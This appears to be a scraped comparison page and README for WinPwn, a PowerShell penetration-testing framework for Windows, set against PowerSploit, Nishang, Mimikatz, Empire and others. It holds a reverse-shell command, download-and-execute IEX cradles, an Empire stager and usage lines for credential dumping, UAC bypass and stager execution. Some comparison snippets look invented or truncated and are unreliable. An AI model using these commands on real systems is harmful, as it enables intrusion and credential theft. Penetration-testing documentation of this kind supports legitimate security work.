Top Related Projects
PowerSploit - A PowerShell Post-Exploitation Framework
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Six Degrees of Domain Admin
A little tool to play with Windows security
Empire is a PowerShell and Python post-exploitation agent.
A swiss army knife for pentesting networks
Quick Overview
The GitHub repository S3cur3Th1sSh1t/WinPwn is a collection of PowerShell scripts and tools designed to assist in the penetration testing and exploitation of Windows systems. It provides a comprehensive set of utilities for various tasks, such as privilege escalation, lateral movement, and information gathering.
Pros
- Extensive collection of PowerShell scripts covering a wide range of Windows-specific security tasks
- Actively maintained and regularly updated with new features and bug fixes
- Provides a centralized and organized repository for Windows-focused security tools
- Includes detailed documentation and usage examples for each script
Cons
- Requires a good understanding of PowerShell and Windows system internals to effectively use the tools
- Some scripts may have potential ethical or legal implications, and should be used with caution
- Dependency on PowerShell may limit the usage on non-Windows platforms
- Potential security risks if the scripts are not thoroughly reviewed and understood before execution
Code Examples
N/A (This is not a code library)
Getting Started
N/A (This is not a code library)
Competitor Comparisons
PowerSploit - A PowerShell Post-Exploitation Framework
Pros of PowerSploit
- More mature and well-established project with a larger community
- Extensive documentation and usage examples
- Broader range of post-exploitation modules and techniques
Cons of PowerSploit
- Less frequent updates and maintenance
- Some modules may be detected by modern antivirus solutions
- Lacks some of the newer Windows 10/11 specific attack vectors
Code Comparison
PowerSploit:
Get-GPPPassword -Server DC01
Invoke-Mimikatz -DumpCreds
Get-NetComputer -FullData | Select-Object name,operatingsystem
WinPwn:
Invoke-InveighRelay -ConsoleOutput Y -FileOutput Y
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.1 -Port 4444
Invoke-Bloodhound -CollectionMethod All -NoSaveCache
Both repositories offer powerful post-exploitation tools for Windows environments, but they differ in their approach and focus. PowerSploit provides a comprehensive set of modules for various tasks, while WinPwn emphasizes automation and ease of use for penetration testing. PowerSploit's code tends to be more modular and function-based, whereas WinPwn often combines multiple techniques into single commands for quicker execution. Users should consider their specific needs and target environment when choosing between these tools.
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Pros of Nishang
- More comprehensive collection of PowerShell scripts for various penetration testing tasks
- Better documentation and usage examples for individual scripts
- Longer development history and larger community support
Cons of Nishang
- Less focus on automation and ease of use compared to WinPwn
- May require more manual intervention and script selection for specific tasks
- Not as actively maintained as WinPwn in recent years
Code Comparison
Nishang (Get-Information.ps1):
function Get-Information
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[Switch]
$All
)
$output = @()
$output += "Logged in users: " + (Get-WmiObject -Class Win32_ComputerSystem | Select-Object -ExpandProperty UserName)
WinPwn (Get-WinPwnInformation.ps1):
function Get-WinPwnInformation
{
[CmdletBinding()]
Param(
[Switch]$All
)
Write-Output "Gathering system information..."
$info = @{}
$info["Hostname"] = $env:COMPUTERNAME
Both scripts aim to gather system information, but WinPwn's approach is more streamlined and focused on automation.
Six Degrees of Domain Admin
Pros of BloodHound
- Provides a comprehensive visual representation of Active Directory relationships
- Offers powerful path-finding capabilities for identifying attack vectors
- Supports custom Cypher queries for advanced analysis
Cons of BloodHound
- Requires more setup and infrastructure compared to WinPwn
- May have a steeper learning curve for users unfamiliar with graph databases
- Limited to Active Directory environments, while WinPwn has broader functionality
Code Comparison
BloodHound (JavaScript):
export const setDBCredentials = (url, username, password) => {
appStore.dbUrl = url;
appStore.dbUsername = username;
appStore.dbPassword = password;
};
WinPwn (PowerShell):
function Invoke-InveighRelay {
param (
[Parameter(Position = 0, Mandatory = $false)]
[ValidateSet("Y","N")]
[string]
$HTTP = "Y"
)
# Function implementation
}
BloodHound focuses on graph database interactions and visualization, while WinPwn provides a wide range of PowerShell-based penetration testing tools. BloodHound's code is primarily JavaScript-based, whereas WinPwn utilizes PowerShell for its functionality.
A little tool to play with Windows security
Pros of Mimikatz
- More established and widely recognized in the security community
- Offers a broader range of Windows credential extraction techniques
- Provides both a command-line interface and a graphical user interface
Cons of Mimikatz
- Often flagged by antivirus software due to its popularity
- Requires more manual intervention and expertise to use effectively
- Less frequently updated compared to WinPwn
Code Comparison
Mimikatz (C):
BOOL MIMIKATZ_EXPORTS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
{
BYTE ntlm[LM_NTLM_HASH_LENGTH];
TOKEN_STATISTICS tokenStats;
SEKURLSA_PTH_DATA data = {&tokenStats.AuthenticationId, NULL, NULL, NULL, FALSE};
// ... (additional code)
}
WinPwn (PowerShell):
function Invoke-WinPwn
{
[CmdletBinding()]
Param(
[Switch]
$noninteractive,
[Switch]
$consoleoutput,
[Switch]
$passwordspray,
# ... (additional parameters)
)
# ... (function body)
}
Both tools aim to exploit Windows security vulnerabilities, but they differ in implementation and approach. Mimikatz is written in C and focuses on low-level system interactions, while WinPwn is a PowerShell-based framework that provides a more user-friendly interface for various post-exploitation techniques.
Empire is a PowerShell and Python post-exploitation agent.
Pros of Empire
- More comprehensive post-exploitation framework with a wider range of modules and capabilities
- Supports multiple operating systems (Windows, macOS, Linux)
- Active community and regular updates
Cons of Empire
- Larger footprint and potentially easier to detect
- Steeper learning curve due to its complexity
- Requires more setup and configuration
Code Comparison
Empire (PowerShell stager):
$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX $wc.DownloadString('http://empire.server/launcher');
WinPwn (PowerShell execution):
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
Invoke-WinPwn
Both projects utilize PowerShell for execution, but Empire's stager is more complex and includes additional features like user-agent spoofing and proxy handling. WinPwn's execution is simpler and directly invokes the main script from the repository.
A swiss army knife for pentesting networks
Pros of CrackMapExec
- Cross-platform support (Windows, Linux, macOS)
- Extensive protocol support (SMB, WMI, MSSQL, etc.)
- Active development and large community
Cons of CrackMapExec
- Steeper learning curve due to more complex features
- Requires more setup and dependencies
- Less focused on Windows-specific post-exploitation
Code Comparison
WinPwn (PowerShell):
function Invoke-WinPwn
{
[CmdletBinding()]
Param(
[Switch]
$noninteractive,
[Switch]
$consoleoutput,
[Switch]
$passwordspr
)
# ... (additional code)
}
CrackMapExec (Python):
def main():
try:
options = parse_args()
if options.verbose:
set_logger(options.verbose)
# ... (additional code)
except KeyboardInterrupt:
print('\n[!] Exiting...')
sys.exit(0)
WinPwn is a PowerShell-based tool specifically designed for Windows post-exploitation, offering a more streamlined experience for Windows environments. It provides an interactive menu-driven interface, making it easier for less experienced users to navigate.
CrackMapExec, on the other hand, is a more versatile and powerful tool written in Python. It supports multiple protocols and platforms, making it suitable for diverse penetration testing scenarios. However, this versatility comes at the cost of a steeper learning curve and more complex setup.
Both tools are actively maintained and have their strengths, with WinPwn being more focused on Windows-specific tasks and CrackMapExec offering broader functionality across different environments.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
Sponsored by
WinPwn
In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. I also often ran the same scripts one after the other to get information about the current system and/or the domain. To automate as many internal penetrationtest processes (reconnaissance as well as exploitation) and for the proxy reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects.
Any suggestions, feedback, Pull requests and comments are welcome!
Just Import the Modules with:
Import-Module .\WinPwn.ps1
or
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
To bypass AMSI take one of the existing bypass techniques, find the AMSI trigger and manually change it in the bypass function or encode the trigger string. Alternatively obfuscate the whole script.
If you find yourself stuck on a windows system with no internet access - no problem at all, just use Offline_Winpwn.ps1
, the most important scripts and executables are included.
Functions available after Import:
-
WinPwn
-> Menu to choose attacks:
-
Inveigh
-> Executes Inveigh in a new Console window , SMB-Relay attacks with Session management (Invoke-TheHash) integrated -
SessionGopher
-> Executes Sessiongopher Asking you for parameters -
Kittielocal
->- Obfuscated Invoke-Mimikatz version
- Safetykatz in memory
- Dump lsass using rundll32 technique
- Download and run obfuscated Lazagne
- Dump Browser credentials
- Customized Mimikittenz Version
- Exfiltrate Wifi-Credentials
- Dump SAM-File NTLM Hashes
- SharpCloud
-
Localreconmodules
->- Collect installed software, vulnerable software, Shares, network information, groups, privileges and many more
- Check typical vulns like SMB-Signing, LLMNR Poisoning, MITM6 , WSUS over HTTP
- Checks the Powershell event logs for credentials or other sensitive informations
- Collect Browser Credentials and history
- Search for passwords in the registry and on the file system
- Find sensitive files (config files, RDP files, keepass Databases)
- Search for .NET Binaries on the local system
- Optional: Get-Computerdetails (Powersploit) and PSRecon
-
Domainreconmodules
->- Collect various domain informations for manual review
- Find AD-Passwords in description fields
- Search for potential sensitive domain share files
- Unconstrained delegation systems/users are enumerated
- Generate Bloodhound Report
- MS17-10 Scanner for domain systems
- Bluekeep Scanner for domain systems
- SQL Server discovery and Auditing functions - PowerUpSQL
- MS-RPRN Check for Domaincontrollers or all systems
- Group Policy Audit with Grouper2
- An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon
- Check Printers for common vulns
- Search for Resource-Based Constrained Delegation attack paths
- Check all DCs for zerologon - CVE-2020-1472
- And more, just take a look
-
Privescmodules
- itm4ns Invoke-PrivescCheck
- winPEAS
- Powersploits PowerUp Allchecks, Sherlock, GPPPasswords
- Dll Hijacking, File Permissions, Registry permissions and weak keys, Rotten/Juicy Potato Check
-
kernelexploits
->- MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only!
- MS16-032 - (2008/7/8/10/2012)!
- MS16-135 - (WS2k16 only)!
- CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1!
- CVE-2019-0841 - April 2019!
- CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019!
- CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019!
- CVE-2019-1215 - September 2019 - x64 only!
- CVE-2020-0638 - February 2020 - x64 only!
- CVE-2020-0796 - SMBGhost
- CVE-2020-0787 - March 2020 - all windows versions
- CVE-2021-34527/CVE-2021-1675 - June 2021 - PrintNightmare
- CVE-2021-40449 - CallbackHell - October 2021
- Juicy-Potato Exploit
- itm4ns Printspoofer
-
UACBypass
->- UAC Magic, Based on James Forshaw's three part post on UAC
- UAC Bypass cmstp technique, by Oddvar Moe
- DiskCleanup UAC Bypass, by James Forshaw
- DccwBypassUAC technique, by Ernesto Fernandez and Thomas Vanhoutte
-
SYSTEMShell
->- Pop System Shell using CreateProcess
- Pop System Shell using NamedPipe Impersonation
- Pop System Shell using Token Manipulation
- Bind System Shell using UsoClient DLL load or CreateProcess
-
Shareenumeration
-> Invoke-Filefinder and Invoke-Sharefinder (Powerview / Powersploit) -
Domainshares
-> Snaffler or Passhunt search over all domain systems -
Groupsearch
-> Get-DomainGPOUserLocalGroupMapping - find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit) -
Kerberoasting
-> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking -
PowerSQL
-> SQL Server discovery, Check access with current user, Audit for default credentials + UNCPath Injection Attacks -
Sharphound
-> Bloodhound 3.0 Report -
Adidnsmenu
-> Create Active Directory-Integrated DNS Nodes or remove them -
MS17-10
-> Scan active windows Servers in the domain or all systems for MS17-10 (Eternalblue) vulnerability -
Sharpcradle
-> Load C# Files from a remote Webserver to RAM -
DomainPassSpray
-> DomainPasswordSpray Attacks, one password for all domain users -
Bluekeep
-> Bluekeep Scanner for domain systems
Without parameters, most of the functions can only be used from an interactive shell. So i decided to add the parameters -noninteractive
and -consoleoutput
to make the script usable from
an asynchronous C2-Framework like Empire, Covenant, Cobalt Strike or others.
Additionally the -repo
parameter was added to use WinPwn with all its features from a local repository. They can be used as follows:
Usage:
-noninteractive -> No questions for functions so that they run with predefined or user defined parameters
-consoleoutput -> The loot/report folders are not created. Every function returns the output to the console so that you can take a look at everything in the Agent logs of your C2-Framework Examples:
WinPwn -noninteractive -consoleoutput -DomainRecon
-> This will return every single domain recon script and
function and will probably give you really much output
WinPwn -noninteractive -consoleoutput -Localrecon
-> This will enumerate as much information for the local
system as possible
Generalrecon -noninteractive
-> Execute basic local recon functions and store the output
in the corresponding folders
UACBypass -noninteractive -command "C:\temp\stager.exe" -technique ccmstp
-> Execute a stager in a high integrity
process from a low privileged session
Kittielocal -noninteractive -consoleoutput -browsercredentials
-> Dump Browser-Credentials via Sharpweb
returning the output to console
Kittielocal -noninteractive -browsercredentials
-> Dump SAM File NTLM-Hashes and store
the output in a file
WinPwn -PowerSharpPack -consoleoutput -noninteractive
-> Execute Seatbelt, PowerUp, Watson and
more C# binaries in memory
Dotnetsearch -consoleoutput -noninteractive
-> Search in C:\Program Files\
and C:\Program Files (x86)\
for .NET assemblies
WinPwn -repo http://192.168.1.10:8000/WinPwn_Repo
-> Use a local webserver as offline repo to use WinPwn without internet access
Get_WinPwn_Repo.sh:
Usage: ./Get_WinPwn_Repo.sh {Option}
Example: ./Get_WinPwn_Repo.sh --install
Options: --install Download the repository and place it to ./WinPwn_Repo/ --remove Remove the repository ./WinPwn_Repo/ --reinstall Remove the repository and download a new one to ./WinPwn_Repo/ --start-server Start a python HTTP server on port 8000 --help Show this help
TO-DO
- Some obfuskation
- More obfuscation
- Proxy via PAC-File support
- Get the scripts from my own creds repository (https://github.com/S3cur3Th1sSh1t/Creds) to be independent from changes in the original repositories
- More Recon/Exploitation functions
- Add menu for better handling of functions
- Amsi Bypass
- Block ETW
CREDITS
- Kevin-Robertson - Inveigh, Powermad, Invoke-TheHash
- Arvanaghi - SessionGopher
- PowerShellMafia - Powersploit
- Dionach - PassHunt
- A-mIn3 - WINSpect
- 411Hall - JAWS
- sense-of-security - ADrecon
- dafthack - DomainPasswordSpray
- rasta-mouse - Sherlock, Amsi Bypass, PPID Spoof & BlockDLLs
- AlessandroZ - LaZagne
- samratashok - nishang
- leechristensen - Random Repo, Spoolsample, other ps1 scripts
- HarmJ0y - Many good Blogposts, Gists and Scripts, all Ghostpack binaries
- NETSPI - PowerUpSQL
- Cn33liz - p0wnedShell
- rasta-mouse - AmsiScanBufferBypass
- l0ss - Grouper2,Snaffler,Grouper3
- dafthack - DomainPasswordSpray
- enjoiz - PrivEsc
- itm4n - Invoke-PrivescCheck & PrintSpoofer
- James Forshaw - UACBypasses
- Oddvar Moe - UACBypass
- Carlos Polop - winPEAS
- gentilkiwi - Mimikatz, Kekeo
- hlldz - Invoke-Phantom
- Matthew Graeber - many Ps1 Scripts which are nearly used everywhere
- Steve Borosh - Misc-Powershell-Scripts, SharpPrinter, SharpSSDP
- Sean Metcalf - SPN-Scan + many usefull articles @adsecurity.org
- @l0ss and @Sh3r4 - Snaffler
- FSecureLABS - GPO Tools
- vletoux - PingCastle Scanners
- NCCGroup + BC-Security - ZeroLogon Scanner
- All people working on Bloodhound - SharpHound Collector
- klezVirus - SharpLdapRelayScan
- cube0x0 - LdapSignCheck + other toolings
- @s4ntiago_p - NanoDump
- @thefLinkk - Handlekatz
- @Mayyhem - SharpSCCM
- @cube0x0 - LdapSignCheck
- @klezVirus - SharpLdapRelayScan
- @HarmJ0y, @leechristensen, @CCob - Certify
- Many more people in the Community - I'm sure, that I've forgotten many other invididuals who indirectly contributed into this Script
Stargazers over time
Legal disclaimer:
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.
Top Related Projects
PowerSploit - A PowerShell Post-Exploitation Framework
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Six Degrees of Domain Admin
A little tool to play with Windows security
Empire is a PowerShell and Python post-exploitation agent.
A swiss army knife for pentesting networks
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot